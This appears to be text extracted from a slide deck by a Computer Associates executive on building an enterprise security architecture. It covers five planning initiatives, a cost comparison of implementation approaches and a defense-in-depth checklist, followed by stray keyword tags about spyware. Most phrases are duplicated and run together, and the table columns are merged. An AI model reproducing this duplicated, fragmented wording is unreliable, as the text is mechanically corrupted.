1.1. Assessment Of Existing Security EnvironmentAssessment Of Existing Security Environment

Development of an effective enterprise security architecture must Development of an effective enterprise security architecture must begin with an analysis of the effectiveness of existing security begin with an analysis of the effectiveness of existing security controls.controls.

2.2. Development Of A Security Architecture That Supports Business Development Of A Security Architecture That Supports Business ObjectivesObjectives

Understand business objectives and strategy, and develop an Understand business objectives and strategy, and develop an end-state vision of the way in which security will support and end-state vision of the way in which security will support and enable those objectives.enable those objectives.

3.3. Development Of An Enterprise-Wide Security Architecture That Development Of An Enterprise-Wide Security Architecture That Supports Business StrategySupports Business Strategy

Define the end-state architecture, including the integration and Define the end-state architecture, including the integration and deployment across the enterprise of structural, procedural, deployment across the enterprise of structural, procedural, knowledge, technology or support focused security initiatives knowledge, technology or support focused security initiatives consistent with the business vision.consistent with the business vision.

5 Initiatives of an Enterprise Security Architecture (cont.)5 Initiatives of an Enterprise Security Architecture (cont.)

4.4. Development Of A Security Program That Maintains A High Security Development Of A Security Program That Maintains A High Security PosturePosture

Establish design principles and standards and transfer Establish design principles and standards and transfer knowledge to enable the continued integrity of the security knowledge to enable the continued integrity of the security architecture as it evolves with new technologies and threats to architecture as it evolves with new technologies and threats to information assets over time.information assets over time.

5.5. Identify An Appropriate Security Migration StrategyIdentify An Appropriate Security Migration Strategy

Plan the transition from the current environment to the end-state Plan the transition from the current environment to the end-state architecture.architecture.

Implementation Approach ComparisonImplementation Approach Comparison

Piece Meal EnterpriseImplementation Implementation

• Total Cost $ 8,429 $7,761• Expense Cost $ 4,079 $ 194• Capital Cost $ 4,350 $7,567• Discount 15% 25%• Completion Year 2005 Year 2003• Management Multiple Single• Accountability Many One• Integrated Low High• “Win” FactorLow Visibility High Visibility

ConclusionConclusion

Preparing for risks brings tangible benefits in hostile environment:Preparing for risks brings tangible benefits in hostile environment:

• Perimeter is disappearing, threats are 360 degreesPerimeter is disappearing, threats are 360 degrees

• Exploits and hacking tools are readily availableExploits and hacking tools are readily available

• Skills required to exploit threats are low and droppingSkills required to exploit threats are low and dropping

• Blended threats will become more sophisticatedBlended threats will become more sophisticated

Defense in depth across entire network is key:Defense in depth across entire network is key:

• Vulnerability managementVulnerability management

• Firewalls and VPNsFirewalls and VPNs

• AntivirusAntivirus

• Intrusion detectionIntrusion detection

• Support and alerting servicesSupport and alerting services

•ID ManagementID Management

•Forensics ToolsForensics Tools

Implement process to manage policy and incidentsImplement process to manage policy and incidents

Top management support and awareness training are keyTop management support and awareness training are key

DiscussionDiscussion

Michael CoadyMichael Coady

Computer Associates Intl.Computer Associates Intl.

Vice President , North AmericaVice President , North America

Security ServicesSecurity Services

designing a secure organization

Documents

manifestations of spyware

spyware threatat mid

websitesredirect users

user privacy

internetflood users

users knowledge

information theft

business risks